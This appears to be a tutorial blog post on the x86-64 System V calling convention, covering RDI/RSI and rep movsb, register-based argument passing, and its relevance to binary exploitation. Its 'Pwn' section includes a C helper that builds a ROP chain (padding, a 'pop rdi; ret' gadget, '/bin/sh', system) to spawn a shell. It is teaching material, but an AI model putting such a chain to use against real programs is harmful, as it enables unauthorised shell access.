The “Unwritten Rule” of RDI as the First Argument

Created on Mar 5, 2026

Updated on Mar 5, 2026

By Vesper Vei

4 minutes read

Table of Contents

The “Unwritten Rule” of RDI as the First Argument
1. Hardware Legacy: Enabling “Zero-Cost” Calls to System Instructions
2. Performance Revolution: Evolving from the “Memory Era” to the “Register Era”
3. Practical Significance: Impact on Pwn and Reverse Engineering
Summary Comparison Table

The “Unwritten Rule” of RDI as the First Argument

Why does the x86-64 calling convention specify that RDI holds the first argument and RSI the second? Why not pick two other registers, such as R8 and R9? The question gets to the core of low-level design.

The reasons behind this can mainly be summarized in two points: the continuation of hardware legacy and extreme performance optimization.

1. Hardware Legacy: Enabling “Zero-Cost” Calls to System Instructions

In C, the operational logic of many fundamental functions is “destination $\leftarrow$ source”. The most typical example is memcpy(dest, src, size).

RDI: the DI stands for Destination Index.
RSI: the SI stands for Source Index.

The brilliance of the design:

The x86 architecture has built-in “string instructions” (such as movsb). Their operands are implicit and fixed by the instruction set: movsb always reads from the address in RSI and writes to the address in RDI, and with the rep prefix it repeats RCX times.

If the calling convention (ABI) specifies that the first argument goes into RDI and the second into RSI, then when you write memcpy(dest, src, n):

dest is already in RDI.
src is already in RSI.
No mov instructions are needed to shuffle the two pointers. Only the byte count has to move, from RDX (the third argument) into RCX (the counter that rep uses); after that, a single rep movsb can perform the copy.

Conclusion: this design allows high-frequency C functions (such as string processing and memory copying) to connect directly to the CPU’s hardware-accelerated instructions.
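The point above can be sketched in C with inline assembly. This is a minimal illustration, assuming GCC or Clang on x86-64; copy_with_movsb is a hypothetical helper name, not a library function, and a real memcpy is considerably more sophisticated. The constraint letters "D", "S", and "c" ask the compiler to place the operands in RDI, RSI, and RCX, which is exactly where rep movsb expects them.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: copy n bytes from src to dest using `rep movsb`.
 * On other compilers or architectures it falls back to memcpy. */
void *copy_with_movsb(void *dest, const void *src, size_t n) {
    void *ret = dest;                       /* memcpy-style return value */
    assert(n == 0 || (dest != NULL && src != NULL));
#if defined(__x86_64__) && (defined(__GNUC__) || defined(__clang__))
    /* "D" = RDI (destination), "S" = RSI (source), "c" = RCX (count).
     * The instruction advances all three, so they are read-write ("+").
     * The ABI guarantees the direction flag is clear on function entry,
     * so the copy runs forward. */
    __asm__ volatile("rep movsb"
                     : "+D"(dest), "+S"(src), "+c"(n)
                     :
                     : "memory");
#else
    memcpy(dest, src, n);                   /* portable fallback */
#endif
    return ret;
}
```

Because dest and src already arrive in RDI and RSI under the System V convention, a compiler typically only has to move n from RDX into RCX before the instruction.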

2. Performance Revolution: Evolving from the “Memory Era” to the “Register Era”

In the old 32-bit (x86) era, the common calling conventions (such as cdecl) placed function arguments on the stack.

Drawback: the stack resides in memory, and CPU access to memory is far slower than access to registers. Every function call required writing to memory and reading from memory, which was highly wasteful.

In the 64-bit (x86-64) era, the number of general-purpose registers doubled from 8 to 16. Engineers established a set of rules (the System V ABI) under which the first 6 integer or pointer arguments are passed in registers, in this order: RDI, RSI, RDX, RCX, R8, R9.
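As a rough sketch, the rule can be written as a lookup table. The function name sysv_int_arg_location is made up for this illustration, and the table covers only integer and pointer arguments (floating-point arguments use a separate set of XMM registers).

```c
#include <assert.h>
#include <stddef.h>

/* Integer/pointer argument registers, in System V x86-64 order. */
static const char *const SYSV_INT_ARG_REGS[] = {
    "rdi", "rsi", "rdx", "rcx", "r8", "r9"
};

#define SYSV_INT_ARG_REG_COUNT \
    (sizeof SYSV_INT_ARG_REGS / sizeof SYSV_INT_ARG_REGS[0])

static_assert(SYSV_INT_ARG_REG_COUNT == 6, "six integer argument registers");

/* Hypothetical helper: where does the index-th (0-based) integer or
 * pointer argument live? Returns a register name, or "stack" once the
 * six registers are used up. */
const char *sysv_int_arg_location(size_t index) {
    return index < SYSV_INT_ARG_REG_COUNT ? SYSV_INT_ARG_REGS[index]
                                          : "stack";
}
```

For a call such as memcpy(dest, src, n), indices 0, 1, and 2 map to rdi, rsi, and rdx.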

Why this particular order?

It works like a “standard protocol.” Without such a rule:

Programmer A might write a function assuming the first argument is in RAX.
Programmer B might write code that passes the argument in RBX.
Result: the callee reads garbage from the wrong register, and the program misbehaves or crashes.

The purpose of uniformly specifying RDI, RSI, … is to ensure that compilers, operating systems, and code written in different languages can communicate with each other seamlessly. It is like everyone agreeing to drive on the right side of the road.

3. Practical Significance: Impact on Pwn and Reverse Engineering

For students learning binary security (Pwn), understanding this is crucial:

Finding gadgets: when constructing a ROP chain, you often need to control the first argument (for example, system("/bin/sh")). Since you know the rule is RDI, you will specifically look for instruction snippets like pop rdi; ret.
Quickly locating vulnerabilities: when you see code in a disassembler (such as IDA) passing a strange address into RDI and then calling a function, you can immediately realize: “Oh, it is setting up the first argument of that function.”
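The gadget-hunting idea can be sketched as a small payload builder. Everything here is hypothetical: build_system_chain is a made-up name, and the gadget, string, and function addresses must come from the actual target binary. The layout is padding up to the saved return address, then the address of a pop rdi; ret gadget, then the value to load into RDI, then the address of system.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Store a 64-bit value in little-endian byte order, as x86-64 expects. */
static void put_le64(uint8_t *p, uint64_t v) {
    for (int i = 0; i < 8; i++) {
        p[i] = (uint8_t)(v >> (8 * i));
    }
}

/* Hypothetical helper: lay out a chain that calls system(binsh_addr).
 * All addresses are placeholders supplied by the caller.
 * Returns the payload length, or 0 if it does not fit in `out`. */
size_t build_system_chain(uint8_t *out, size_t cap, size_t padding_len,
                          uint64_t pop_rdi_ret, uint64_t binsh_addr,
                          uint64_t system_addr) {
    size_t total = padding_len + 3 * 8;
    assert(out != NULL);
    if (total < padding_len || total > cap) {
        return 0;                              /* overflow or too small */
    }
    memset(out, 'A', padding_len);             /* filler up to return address */
    put_le64(out + padding_len, pop_rdi_ret);  /* 1. jump to pop rdi; ret */
    put_le64(out + padding_len + 8, binsh_addr);   /* 2. popped into RDI */
    put_le64(out + padding_len + 16, system_addr); /* 3. ret lands in system */
    return total;
}
```

On real targets an extra ret gadget is often needed before system to keep the stack 16-byte aligned; that detail is left out of this sketch.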

Summary Comparison Table

Dimension	Old Era (32-bit x86, cdecl)	New Era (64-bit x86-64, System V)	Benefit
Argument location	Stack (memory)	Registers (RDI, RSI, …) for the first six integer/pointer arguments	Fast (a register is read in about one cycle, with no memory round trip)
Call-site instructions	One push per argument, plus stack cleanup by the caller	A simple mov (or lea) per argument	Often smaller code and fewer memory operations
Register choice	Not applicable (arguments are not in registers)	RDI/RSI match the destination/source roles of the string instructions	memcpy-style code needs little or no register shuffling

When a function takes more than 6 integer or pointer arguments, the registers run out and the remaining arguments are passed on the memory stack.
